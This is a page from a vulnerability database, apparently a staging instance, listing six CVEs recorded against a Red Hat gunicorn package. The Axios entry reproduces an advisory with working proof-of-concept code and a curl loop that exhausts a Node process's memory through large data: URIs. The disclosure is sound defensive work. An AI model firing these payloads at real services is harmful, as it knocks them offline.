Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:rpm/redhat/python3.11-gunicorn@23.0.0-1?arch=el9ap
purl pkg:rpm/redhat/python3.11-gunicorn@23.0.0-1?arch=el9ap
Next non-vulnerable version None.
Latest non-vulnerable version None.
Risk 10.0
Vulnerabilities affecting this package (6)
Vulnerability Summary Fixed by
VCID-5ahj-2e48-k3bq
Aliases:
CVE-2025-9909
aap-gateway: Improper Path Validation in Gateway Allows Credential Exfiltration There are no reported fixed by versions.
VCID-6wx7-16zc-8qck
Aliases:
CVE-2025-9907
event-driven-ansible: Event Stream Test Mode Exposes Sensitive Headers in AAP EDA There are no reported fixed by versions.
VCID-9uzd-mmyv-mfh4
Aliases:
CVE-2025-64459
GHSA-frmv-pr5f-9mcr
Django vulnerable to SQL injection via _connector keyword argument in QuerySet and Q objects. An issue was discovered in 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8. The methods `QuerySet.filter()`, `QuerySet.exclude()`, and `QuerySet.get()`, and the class `Q()`, are subject to SQL injection when using a suitably crafted dictionary, with dictionary expansion, as the `_connector` argument. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank cyberstan for reporting this issue. There are no reported fixed by versions.
VCID-aq84-8cnz-byax
Aliases:
CVE-2025-58754
GHSA-4hjh-wcwx-xvwj
Axios is vulnerable to DoS attack through lack of data size check ## Summary When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`. ## Details The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob. Relevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231): ```js const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls); const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined); const protocol = parsed.protocol || supportedProtocols[0]; if (protocol === 'data:') { let convertedData; if (method !== 'GET') { return settle(resolve, reject, { status: 405, ... }); } convertedData = fromDataURI(config.url, responseType === 'blob', { Blob: config.env && config.env.Blob }); return settle(resolve, reject, { data: convertedData, status: 200, ... }); } ``` The decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27): ```js export default function fromDataURI(uri, asBlob, options) { ... if (protocol === 'data') { uri = protocol.length ? uri.slice(protocol.length + 1) : uri; const match = DATA_URL_PATTERN.exec(uri); ... const body = match[3]; const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8'); if (asBlob) { return new _Blob([buffer], {type: mime}); } return buffer; } throw new AxiosError('Unsupported protocol ' + protocol, ...); } ``` * The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks. * It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams. * As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory. In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs. ## PoC ```js const axios = require('axios'); async function main() { // this example decodes ~120 MB const base64Size = 160_000_000; // 120 MB after decoding const base64 = 'A'.repeat(base64Size); const uri = 'data:application/octet-stream;base64,' + base64; console.log('Generating URI with base64 length:', base64.length); const response = await axios.get(uri, { responseType: 'arraybuffer' }); console.log('Received bytes:', response.data.length); } main().catch(err => { console.error('Error:', err.message); }); ``` Run with limited heap to force a crash: ```bash node --max-old-space-size=100 poc.js ``` Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error: ``` <--- Last few GCs ---> … FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory 1: 0x… node::Abort() … … ``` Mini Real App PoC: A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS. ```js import express from "express"; import morgan from "morgan"; import axios from "axios"; import http from "node:http"; import https from "node:https"; import { PassThrough } from "node:stream"; const keepAlive = true; const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 }); const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 }); const axiosClient = axios.create({ timeout: 10000, maxRedirects: 5, httpAgent, httpsAgent, headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" }, validateStatus: c => c >= 200 && c < 400 }); const app = express(); const PORT = Number(process.env.PORT || 8081); const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb"; app.use(express.json({ limit: BODY_LIMIT })); app.use(morgan("combined")); app.get("/healthz", (req,res)=>res.send("ok")); /** * POST /preview { "url": "<http|https|data URL>" } * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector). */ app.post("/preview", async (req, res) => { const url = req.body?.url; if (!url) return res.status(400).json({ error: "missing url" }); let u; try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); } // Developer allows using data:// in the allowlist const allowed = new Set(["http:", "https:", "data:"]); if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" }); const controller = new AbortController(); const onClose = () => controller.abort(); res.on("close", onClose); const before = process.memoryUsage().heapUsed; try { const r = await axiosClient.get(u.toString(), { responseType: "stream", maxContentLength: 8 * 1024, // Axios will ignore this for data: maxBodyLength: 8 * 1024, // Axios will ignore this for data: signal: controller.signal }); // stream only the first 64KB back const cap = 64 * 1024; let sent = 0; const limiter = new PassThrough(); r.data.on("data", (chunk) => { if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); } else { sent += chunk.length; limiter.write(chunk); } }); r.data.on("end", () => limiter.end()); r.data.on("error", (e) => limiter.destroy(e)); const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); limiter.pipe(res); } catch (err) { const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); res.status(502).json({ error: String(err?.message || err) }); } finally { res.off("close", onClose); } }); app.listen(PORT, () => { console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`); console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`); }); ``` Run this app and send 3 post requests: ```sh SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \ | tee payload.json >/dev/null seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null``` ``` --- ## Suggestions 1. **Enforce size limits** For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit. 2. **Stream decoding** Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large. There are no reported fixed by versions.
VCID-pvw1-t3hh-nyep
Aliases:
CVE-2025-9908
event-driven-ansible: Sensitive Internal Headers Disclosure in AAP EDA Event Streams There are no reported fixed by versions.
VCID-qatc-a78d-8ufh
Aliases:
CVE-2025-59530
GHSA-47m2-4cr7-mhcw
quic-go: Panic occurs when queuing undecryptable packets after handshake completion ## Summary A misbehaving or malicious server can trigger an assertion in a quic-go client (and crash the process) by sending a premature HANDSHAKE_DONE frame during the handshake. ## Impact A misbehaving or malicious server can cause a denial-of-service (DoS) attack on the quic-go client by triggering an assertion failure, leading to a process crash. This requires no authentication and can be exploited during the handshake phase. Observed in the wild with certain server implementations (e.g. Solana's Firedancer QUIC). ## Affected Versions - All versions prior to v0.49.1 (for the 0.49 branch) - Versions v0.50.0 to v0.54.0 (inclusive) - Fixed in v0.49.1, v0.54.1, and v0.55.0 onward Users are recommended to upgrade to the latest patched version in their respective maintenance branch or to v0.55.0 or later. ## Details For a regular 1-RTT handshake, QUIC uses three sets of keys to encrypt / decrypt QUIC packets: - Initial keys (derived from a static key and the connection ID) - Handshake keys (derived from the client's and server's key shares in the TLS handshake) - 1-RTT keys (derived when the TLS handshake finishes) On the client side, Initial keys are discarded when the first Handshake packet is sent. Handshake keys are discarded when the server's HANDSHAKE_DONE frame is received, as specified in section 4.9.2 of RFC 9001. Crucially, Initial keys are always dropped before Handshake keys in a standard handshake. Due to packet reordering, it is possible to receive a packet with a higher encryption level before the key for that encryption level has been derived. For example, the server's Handshake packets (containing, among others, the TLS certificate) might arrive before the server's Initial packet (which contains the TLS ServerHello). In that case, the client queues the Handshake packets and decrypts them as soon as it has processed the ServerHello and derived Handshake keys. After completion of the handshake, Initial and Handshake packets are not needed anymore and will be dropped. quic-go implements an [assertion](https://github.com/quic-go/quic-go/blob/v0.55.0/connection.go#L2682-L2685) that no packets are queued after completion of the handshake. A misbehaving or malicious server can trigger this assertion, and thereby cause a panic, by sending a HANDSHAKE_DONE frame before actually completing the handshake. In that case, Handshake keys would be dropped before Initial keys. This can only happen if the server implementation is misbehaving: the server can only complete the handshake after receiving the client's TLS Finished message (which is sent in Handshake packets). ## The Fix quic-go needs to be able to handle misbehaving server implementations, including those that prematurely send a HANDSHAKE_DONE frame. We now discard Initial keys when receiving a HANDSHAKE_DONE frame, thereby correctly handling premature HANDSHAKE_DONE frames. The fix was implemented in https://github.com/quic-go/quic-go/pull/5354. There are no reported fixed by versions.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-01T13:37:07.727802+00:00 RedHat Importer Affected by VCID-aq84-8cnz-byax https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json 38.0.0
2026-04-01T13:36:41.468640+00:00 RedHat Importer Affected by VCID-5ahj-2e48-k3bq https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9909.json 38.0.0
2026-04-01T13:36:40.434741+00:00 RedHat Importer Affected by VCID-pvw1-t3hh-nyep https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9908.json 38.0.0
2026-04-01T13:36:39.393550+00:00 RedHat Importer Affected by VCID-6wx7-16zc-8qck https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9907.json 38.0.0
2026-04-01T13:36:00.734230+00:00 RedHat Importer Affected by VCID-qatc-a78d-8ufh https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-59530.json 38.0.0
2026-04-01T13:35:16.872008+00:00 RedHat Importer Affected by VCID-9uzd-mmyv-mfh4 https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-64459.json 38.0.0